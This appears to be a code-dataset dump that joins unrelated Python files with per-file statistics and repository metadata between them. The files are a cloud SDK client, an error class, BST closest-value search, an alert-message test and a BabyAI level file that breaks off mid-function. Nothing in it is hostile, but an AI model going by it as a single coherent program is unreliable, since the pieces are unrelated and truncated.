    :param UpdatePolicyAssignmentRequest request
    :return: UpdatePolicyAssignmentResponse
    """
    all_params = ['policy_assignment_id', 'policy_assignment_request_body']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # Request body, if one was provided; a streaming request overrides it
    # with its file stream.
    body_params = local_var_params.get('body')
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
        method='PUT',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='UpdatePolicyAssignmentResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_regions_async(self, request):
    """Query regions visible to the tenant.

    Queries the regions visible to the tenant.

    :param ListRegionsRequest request
    :return: ListRegionsResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_regions_with_http_info(request)
    return http_info
def list_regions_with_http_info(self, request):
    """Query regions visible to the tenant.

    Queries the regions visible to the tenant.

    :param ListRegionsRequest request
    :return: ListRegionsResponse
    """
    all_params = ['x_language']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}
    query_params = []

    header_params = {}
    # Optional response-language selector.
    if 'x_language' in local_var_params:
        header_params['X-Language'] = local_var_params['x_language']

    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/regions',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListRegionsResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_resource_relations_async(self, request):
    """List resource relations.

    Given a resource ID, queries the relations between that resource and
    other resources; the relation direction may be "in" or "out".

    :param ShowResourceRelationsRequest request
    :return: ShowResourceRelationsResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.show_resource_relations_with_http_info(request)
    return http_info
def show_resource_relations_with_http_info(self, request):
    """List resource relations.

    Given a resource ID, queries the relations between that resource and
    other resources; the relation direction may be "in" or "out".

    :param ShowResourceRelationsRequest request
    :return: ShowResourceRelationsResponse
    """
    all_params = ['resource_id', 'direction', 'limit', 'marker']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'resource_id' in local_var_params:
        path_params['resource_id'] = local_var_params['resource_id']

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('direction', 'limit', 'marker')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/relations',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowResourceRelationsResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_all_resources_async(self, request):
    """List all resources.

    Returns all resources under the current tenant; requires the
    rms:resources:list permission.

    :param ListAllResourcesRequest request
    :return: ListAllResourcesResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_all_resources_with_http_info(request)
    return http_info
def list_all_resources_with_http_info(self, request):
    """List all resources.

    Returns all resources under the current tenant; requires the
    rms:resources:list permission.

    :param ListAllResourcesRequest request
    :return: ListAllResourcesResponse
    """
    all_params = ['region_id', 'ep_id', 'type', 'limit', 'marker']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('region_id', 'ep_id', 'type',
                                 'limit', 'marker')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/all-resources',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListAllResourcesResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_providers_async(self, request):
    """List cloud services.

    Queries the cloud services, resources and regions supported by RMS.

    :param ListProvidersRequest request
    :return: ListProvidersResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_providers_with_http_info(request)
    return http_info
def list_providers_with_http_info(self, request):
    """List cloud services.

    Queries the cloud services, resources and regions supported by RMS.

    :param ListProvidersRequest request
    :return: ListProvidersResponse
    """
    all_params = ['offset', 'limit', 'x_language']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('offset', 'limit')
                    if name in local_var_params]

    header_params = {}
    # Optional response-language selector.
    if 'x_language' in local_var_params:
        header_params['X-Language'] = local_var_params['x_language']

    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/providers',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListProvidersResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_resources_async(self, request):
    """List resources of a specific type.

    Returns resources of a specific type under the current tenant (e.g.
    provider ``ecs`` with type ``cloudservers``); requires the
    rms:resources:list permission.

    :param ListResourcesRequest request
    :return: ListResourcesResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_resources_with_http_info(request)
    return http_info
def list_resources_with_http_info(self, request):
    """List resources of a specified type.

    Return the resources of a given resource type under the current
    tenant; requires the rms:resources:list permission. For example,
    cloud servers map to RMS resource type ecs.cloudservers (provider
    ``ecs``, type ``cloudservers``).

    :param ListResourcesRequest request
    :return: ListResourcesResponse
    """
    # Kept for parity with the other generated SDK methods.
    all_params = ['provider', 'type', 'region_id', 'ep_id', 'limit', 'marker']

    local_var_params = {
        attr: getattr(request, attr)
        for attr in request.attribute_map
        if hasattr(request, attr)
    }

    collection_formats = {}

    path_params = {
        name: local_var_params[name]
        for name in ('provider', 'type')
        if name in local_var_params
    }

    # Query-string parameters keep their original ordering.
    query_params = [
        (name, local_var_params[name])
        for name in ('region_id', 'ep_id', 'limit', 'marker')
        if name in local_var_params
    ]

    header_params = {}
    form_params = {}

    body_params = None
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    auth_settings = ['PkiTokenAuth']

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/provider/{provider}/type/{type}/resources',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListResourcesResponse',
        response_headers=response_headers,
        auth_settings=auth_settings,
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_resource_by_id_async(self, request):
    """Show a single resource.

    Given a resource ID, return that resource's details; requires the
    rms:resources:get permission. For example, cloud servers map to RMS
    resource type ecs.cloudservers (provider ``ecs``, type
    ``cloudservers``).

    :param ShowResourceByIdRequest request
    :return: ShowResourceByIdResponse
    """
    return self.show_resource_by_id_with_http_info(request)
def show_resource_by_id_with_http_info(self, request):
    """Show a single resource.

    Given a resource ID, return that resource's details; requires the
    rms:resources:get permission.

    :param ShowResourceByIdRequest request
    :return: ShowResourceByIdResponse
    """
    # Kept for parity with the other generated SDK methods.
    all_params = ['provider', 'type', 'resource_id']

    local_var_params = {
        attr: getattr(request, attr)
        for attr in request.attribute_map
        if hasattr(request, attr)
    }

    collection_formats = {}

    path_params = {
        name: local_var_params[name]
        for name in ('provider', 'type', 'resource_id')
        if name in local_var_params
    }

    query_params = []
    header_params = {}
    form_params = {}

    body_params = None
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    auth_settings = ['PkiTokenAuth']

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/provider/{provider}/type/{type}/resources/{resource_id}',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowResourceByIdResponse',
        response_headers=response_headers,
        auth_settings=auth_settings,
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def create_tracker_config_async(self, request):
    """Create or update the tracker.

    Create or update the resource recorder; at most one recorder can
    exist at a time.

    :param CreateTrackerConfigRequest request
    :return: CreateTrackerConfigResponse
    """
    return self.create_tracker_config_with_http_info(request)
def create_tracker_config_with_http_info(self, request):
    """Create or update the tracker.

    Create or update the resource recorder; at most one recorder can
    exist at a time.

    :param CreateTrackerConfigRequest request
    :return: CreateTrackerConfigResponse
    """
    # Kept for parity with the other generated SDK methods. Note it lists
    # 'tracker_config_body' while the payload below is read from the
    # request's 'body' attribute — this mirrors the generated code.
    all_params = ['tracker_config_body']

    local_var_params = {
        attr: getattr(request, attr)
        for attr in request.attribute_map
        if hasattr(request, attr)
    }

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = {}

    body_params = None
    if 'body' in local_var_params:
        body_params = local_var_params['body']
    # A streaming request overrides any attribute-supplied body.
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    auth_settings = ['PkiTokenAuth']

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
        method='PUT',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='CreateTrackerConfigResponse',
        response_headers=response_headers,
        auth_settings=auth_settings,
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def delete_tracker_config_async(self, request):
    """Delete the tracker.

    Remove the resource recorder.

    :param DeleteTrackerConfigRequest request
    :return: DeleteTrackerConfigResponse
    """
    return self.delete_tracker_config_with_http_info(request)
def delete_tracker_config_with_http_info(self, request):
    """Delete the tracker.

    Remove the resource recorder.

    :param DeleteTrackerConfigRequest request
    :return: DeleteTrackerConfigResponse
    """
    # This endpoint takes no request parameters; kept for parity with the
    # other generated SDK methods.
    all_params = []

    local_var_params = {
        attr: getattr(request, attr)
        for attr in request.attribute_map
        if hasattr(request, attr)
    }

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = {}

    body_params = None
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    auth_settings = ['PkiTokenAuth']

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
        method='DELETE',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='DeleteTrackerConfigResponse',
        response_headers=response_headers,
        auth_settings=auth_settings,
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_tracker_config_async(self, request):
    """Show the tracker.

    Query the resource recorder's details.

    :param ShowTrackerConfigRequest request
    :return: ShowTrackerConfigResponse
    """
    return self.show_tracker_config_with_http_info(request)
def show_tracker_config_with_http_info(self, request):
    """Show the tracker.

    Query the resource recorder's details.

    :param ShowTrackerConfigRequest request
    :return: ShowTrackerConfigResponse
    """
    # This endpoint takes no request parameters; kept for parity with the
    # other generated SDK methods.
    all_params = []

    local_var_params = {
        attr: getattr(request, attr)
        for attr in request.attribute_map
        if hasattr(request, attr)
    }

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = {}

    body_params = None
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    auth_settings = ['PkiTokenAuth']

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/tracker-config',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowTrackerConfigResponse',
        response_headers=response_headers,
        auth_settings=auth_settings,
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None,
             post_params=None, response_type=None, response_headers=None, auth_settings=None,
             collection_formats=None, request_type=None):
    """Make the HTTP request and return the deserialized data.

    :param resource_path: Path to method endpoint.
    :param method: Method to call.
    :param path_params: Path parameters in the url.
    :param query_params: Query parameters in the url.
    :param header_params: Header parameters to be
        placed in the request header.
    :param body: Request body.
    :param post_params dict: Request post form parameters,
        for `application/x-www-form-urlencoded`, `multipart/form-data`.
    :param auth_settings list: Auth Settings names for the request.
    :param response_type: Response data type.
    :param response_headers: Header should be added to response data.
    :param collection_formats: dict of collection formats for path, query,
        header, and post parameters.
    :param request_type: Request data type.
    :return: Return the response directly.
    """
    request_kwargs = dict(
        method=method,
        resource_path=resource_path,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body,
        post_params=post_params,
        response_type=response_type,
        response_headers=response_headers,
        collection_formats=collection_formats,
        request_type=request_type,
        # Every request made through this async client is dispatched
        # asynchronously.
        async_request=True,
    )
    return self.do_http_request(**request_kwargs)
| 32.366206
| 209
| 0.643326
| 5,284
| 53,825
| 6.155942
| 0.057721
| 0.039351
| 0.068864
| 0.027546
| 0.889726
| 0.875707
| 0.862703
| 0.827656
| 0.819171
| 0.688207
| 0
| 0.000688
| 0.271212
| 53,825
| 1,662
| 210
| 32.38568
| 0.828536
| 0.13124
| 0
| 0.809874
| 0
| 0.003151
| 0.134063
| 0.056753
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.010504
| 0
| 0.120798
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f31a12a73cfaa3941aba54a9fe9b142eb0792dbb
| 185
|
py
|
Python
|
utilities/generic_exception.py
|
jlgoh/labeldat
|
057248a22c7f022110d712dbcb61befd40e62760
|
[
"MIT"
] | 1
|
2021-09-07T06:34:54.000Z
|
2021-09-07T06:34:54.000Z
|
utilities/generic_exception.py
|
wilsonteng97/labeldat
|
bdca5df0af55bdd460807808861de25d762b28da
|
[
"MIT"
] | 5
|
2021-09-08T02:44:59.000Z
|
2022-02-27T10:55:29.000Z
|
utilities/generic_exception.py
|
wilsonteng97/labeldat
|
bdca5df0af55bdd460807808861de25d762b28da
|
[
"MIT"
] | 1
|
2020-12-31T11:03:39.000Z
|
2020-12-31T11:03:39.000Z
|
class GenericErrorResponse:
    """Lightweight wrapper that renders an error message as a response dict."""

    def __init__(self, message):
        # Text describing the error condition.
        self.message = message

    def to_response(self):
        """Return the JSON-serialisable payload for this error."""
        return dict(message=self.message)
| 18.5
| 36
| 0.578378
| 17
| 185
| 6
| 0.529412
| 0.323529
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32973
| 185
| 9
| 37
| 20.555556
| 0.822581
| 0
| 0
| 0
| 0
| 0
| 0.037838
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b214c20a7bca9eeffba90d71efec35cd39ae1d56
| 1,192
|
py
|
Python
|
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
BST/closest.py
|
mladuke/Algorithms
|
eab5d89c5f496b2849f0646dbfa3a4db93a0b391
|
[
"MIT"
] | null | null | null |
def findClosestValueInBst(tree, target):
    """Return the value stored in the BST `tree` that is closest to `target`.

    Iterative descent: O(h) time and O(1) space, where h is the tree
    height. An exact match returns `target` itself; ties keep the first
    candidate met on the search path (same behaviour as the original).

    Fixes over the original: the best-gap sentinel is now infinity
    (the old magic constant 10**15 silently ignored values farther away
    than that), and an empty tree returns None instead of raising
    AttributeError.

    :param tree: root node exposing `value`, `left` and `right` attributes
                 (or None for an empty tree)
    :param target: number to approximate
    :return: the closest stored value, or None for an empty tree
    """
    closest = None
    best_gap = float("inf")  # smallest |value - target| seen so far
    node = tree
    while node is not None:
        current = node.value
        if current == target:
            return target
        gap = abs(current - target)
        if gap < best_gap:
            best_gap = gap
            closest = current
        # BST property: closer values can only lie on the side of target.
        node = node.right if current < target else node.left
    return closest
def findClosestValueInBst(tree, target):
    """Iteratively walk the BST and return the stored value nearest target.

    An exact match returns target itself; otherwise the closest value seen
    along the root-to-leaf search path is returned.
    """
    best = None
    best_gap = 1000000000000000  # large sentinel, as in the sibling copy
    node = tree
    keep_going = True
    while keep_going:
        keep_going = False
        current = node.value
        if current == target:
            return target
        if current < target:
            gap = target - current
            if gap < best_gap:
                best_gap, best = gap, current
            # Larger values live to the right.
            if node.right is not None:
                node = node.right
                keep_going = True
        elif current > target:
            gap = current - target
            if gap < best_gap:
                best_gap, best = gap, current
            # Smaller values live to the left.
            if node.left is not None:
                node = node.left
                keep_going = True
    return best
| 22.490566
| 44
| 0.639262
| 144
| 1,192
| 5.291667
| 0.166667
| 0.170604
| 0.07874
| 0.099738
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.035714
| 0.248322
| 1,192
| 53
| 45
| 22.490566
| 0.814732
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018868
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b220255f60193e54c35cfb77ffd1bf242baea858
| 1,388
|
py
|
Python
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 5
|
2020-11-06T18:35:57.000Z
|
2021-04-30T07:16:42.000Z
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 5
|
2020-11-05T13:39:28.000Z
|
2021-12-09T04:37:30.000Z
|
IotEdgeModules/modules/DataProcessing/src/tests/processing/alerts/test_message_creator.py
|
muglyon/SmartFactory
|
c02af03f5e1cb5593103937c65a2d0bc4ed4af6c
|
[
"MIT"
] | 8
|
2020-09-25T10:07:15.000Z
|
2022-03-11T06:26:30.000Z
|
from unittest import TestCase
from processing.alerts.message_creator import message_creator
class Test(TestCase):
    """Checks the French wording message_creator produces per operator."""

    def test_message_creator(self):
        # (operator code, expected French wording) — note the original
        # expectations pair "gt" with "supérieur ou égal à" and "gte" with
        # "supérieur à" (and likewise for lt/lte); reproduced verbatim.
        cases = [
            ("eq", "égal à"),
            ("neq", "différent de"),
            ("gt", "supérieur ou égal à"),
            ("gte", "supérieur à"),
            ("lt", "inférieur ou égal à"),
            ("lte", "inférieur à"),
        ]
        timestamp = "2020-10-22T14:16:32.158Z"
        for op, wording in cases:
            self.assertEqual(
                message_creator("Key1", 1, 2, timestamp, op),
                "'1' {} '2' pour la mesure 'Key1' le '{}'".format(wording, timestamp),
            )
| 46.266667
| 93
| 0.556916
| 198
| 1,388
| 3.853535
| 0.19697
| 0.094364
| 0.173001
| 0.204456
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0.750983
| 0
| 0.240722
| 0.2817
| 1,388
| 29
| 94
| 47.862069
| 0.524574
| 0
| 0
| 0.214286
| 0
| 0.214286
| 0.447406
| 0.216138
| 0
| 0
| 0
| 0
| 0.214286
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b272d7981ab73ece95f86278b2d05c7bbb0037c4
| 56,252
|
py
|
Python
|
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | 1
|
2022-03-12T03:10:29.000Z
|
2022-03-12T03:10:29.000Z
|
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | null | null | null |
afk-q-babyai/babyai/levels/info_seeking_levels.py
|
IouJenLiu/AFK
|
db2b47bb3a5614b61766114b87f143e4a61a4a8d
|
[
"MIT"
] | null | null | null |
import gym
from gym_minigrid.envs import Key, Ball, Box
from .levelgen import *
from .objects import DoorWID, KeyWID, BoxWID
import random
import copy
from gym_minigrid.minigrid import fill_coords, point_in_rect, point_in_line, WorldObj, COLORS
from .utils import *
import itertools as itt
class Goal(WorldObj):
    """A walkable goal tile, rendered as a solid square of its colour."""

    def __init__(self, color):
        super().__init__('goal', color)

    def can_overlap(self):
        # The agent may stand on the goal tile.
        return True

    def render(self, img):
        # Fill the whole cell with this tile's colour.
        fill_coords(img, point_in_rect(0, 1, 0, 1), COLORS[self.color])
class Oracle(Ball):
    """A ball-shaped marker for the oracle; the agent can walk over it."""

    def __init__(self, color):
        super().__init__(color)

    def can_overlap(self):
        # Unlike a plain Ball, the oracle does not block movement.
        return True
class Level_GoToFavorite3Room(RoomGridLevel):
    """Three-room 'go to someone's favorite toy' level.

    Two candidate toys are placed in the outer rooms; the instruction asks
    the agent to go to one person's favorite. The useful oracle answers
    reveal which toy it is and which room it is in.
    """

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
        # Lava colours kept for parity with the danger levels; not used in
        # this level's gen_mission.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        # Candidate goal cell in the rightmost room (not placed on the grid
        # by this level).
        self.goal_pos = (room_size * 2 - 3, room_size - 2)
        self.agent_start_pos = (2, 1)
        # call=True: no Oracle object is placed (presumably the oracle is
        # queried via an action — TODO confirm in RoomGridLevel);
        # call=False: a movable Oracle object is placed near the agent.
        self.call = call
        self.names = ['jack', 'mary']
        super().__init__(
            num_rows=1,
            num_cols=3,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Lay out the three connected rooms, two toys, and the instruction."""
        self.target_idx = self.np_random.randint(0, self.n_target)
        # Pin the connecting doors' positions before adding the doors.
        self.room_grid[0][0].door_pos[0] = (6, 1)
        self.room_grid[0][1].door_pos[2] = (6, 1)
        self.room_grid[0][1].door_pos[0] = (12, 5)
        self.room_grid[0][2].door_pos[2] = (12, 5)
        self.add_door(0, 0, door_idx=0, locked=False)
        self.add_door(1, 0, door_idx=0, locked=False)
        # Place obstacles (lava or walls)
        #self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        #add_danger_tiles_anti_diag(self)
        #self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        #add_danger_tiles_diag(self)
        #self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        #add_danger_tiles_anti_diag(self, offset=12)
        if self.call:
            self.grid.set(2, 1, None)
            self.agent_pos = (self.room_size, 1)
        else:
            # Clear a short corridor and drop a movable Oracle next to the
            # agent's start cell.
            self.grid.set(1, 1, None)
            self.grid.set(2, 1, None)
            self.grid.set(3, 1, None)
            self.agent_pos = (1, 1)
            self.oracle_pos = (3, 1)
            self.grid.set(*self.oracle_pos, Oracle(color='red'))
        self.agent_dir = 1
        self.open_all_doors()
        # GoToFav
        self.num_dists = 2
        objs = []
        # One toy in the left room, one in the right room, at fixed cells.
        obj = create_rnd_obj(self)
        place_obj(self, 1, self.room_size - 2, obj)
        objs.append(obj)
        obj = create_rnd_obj(self)
        place_obj(self, (self.room_size - 1) * 3 - 1, 1, obj)
        objs.append(obj)
        target_obj = self._rand_elem(objs)
        self.instrs = FavoriteInstr(ObjDesc(target_obj.type, target_obj.color), name=self.names[0], surface="go to {} toy".format(self.names[0]), danger=False)
        # Room index of the target object (row-major over the room grid).
        room_id = (target_obj.cur_pos[0] // self.room_size) + (target_obj.cur_pos[1] // self.room_size) * self.num_cols
        self.useful_answers = ['{} toy is {} {}'.format(self.names[0], target_obj.color, target_obj.type),
                               '{} {} in room{}'.format(target_obj.color, target_obj.type, room_id)]
class Level_DangerBalancedDiverse(RoomGridLevel):
    """Single-room crossing level with two lava colours.

    Lava 'rivers' split the room. Openings along a guaranteed path to the
    goal are painted in the colour indexed by ``target_idx``; the useful
    oracle answer names the other colour as the danger zone.
    """

    def __init__(self, seed=None, room_size=7, call=True, failure_neg=False):
        # The two lava colours; which index is safe is sampled per episode.
        self.lava_colors = ['yellow', 'blue']
        self.n_target = 2
        self.goal_pos = (room_size - 2, room_size - 2)
        self.agent_start_pos = (2, 1)
        # call=True: agent starts at (2, 1) with no Oracle object;
        # call=False: a movable Oracle is placed at (3, 1) near the agent.
        self.call = call
        super().__init__(
            num_rows=1,
            num_cols=1,
            room_size=room_size,
            seed=seed,
            failure_neg=failure_neg
        )

    def gen_mission(self):
        """Carve lava rivers with colour-balanced openings, place the goal."""
        # Which lava colour marks the traversable openings this episode.
        self.target_idx = self.np_random.randint(0, self.n_target)
        height, width = self.room_size, self.room_size
        # Place obstacles (lava or walls)
        self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
        v, h = object(), object()  # singleton `vertical` and `horizontal` objects
        # Lava rivers or walls specified by direction and position in grid
        rivers = [(v, i) for i in range(2, height - 2, 2)]
        rivers += [(h, j) for j in range(2, width - 2, 2)]
        self.np_random.shuffle(rivers)
        rivers = rivers[:self.num_crossings]  # sample random rivers
        rivers_v = sorted([pos for direction, pos in rivers if direction is v])
        rivers_h = sorted([pos for direction, pos in rivers if direction is h])
        obstacle_pos = itt.chain(
            itt.product(range(1, width - 1), rivers_h),
            itt.product(rivers_v, range(1, height - 1)),
        )
        # Remember which cells got which colour so counts can be rebalanced
        # after openings are carved.
        colored_tiles = [set(), set()]
        for i, j in obstacle_pos:
            color_idx = self.np_random.randint(0, 2)
            self.grid.set(i, j, Lava(self.lava_colors[color_idx]))
            colored_tiles[color_idx].add((i, j))
        # One crossing per river, in a random order, yields a guaranteed
        # path from the start corner to the goal corner.
        path = [h] * len(rivers_v) + [v] * len(rivers_h)
        self.np_random.shuffle(path)
        # Create openings
        limits_v = [0] + rivers_v + [height - 1]
        limits_h = [0] + rivers_h + [width - 1]
        room_i, room_j = 0, 0
        openings = set()
        for direction in path:
            if direction is h:
                i = limits_v[room_i + 1]
                j = self.np_random.choice(
                    range(limits_h[room_j] + 1, limits_h[room_j + 1]))
                room_i += 1
            elif direction is v:
                i = self.np_random.choice(
                    range(limits_v[room_i] + 1, limits_v[room_i + 1]))
                j = limits_h[room_j + 1]
                room_j += 1
            else:
                assert False
            # Openings along the guaranteed path use the target colour.
            self.grid.set(i, j, Lava(self.lava_colors[self.target_idx]))
            openings.add((i, j))
            if (i, j) in colored_tiles[1 - self.target_idx]:
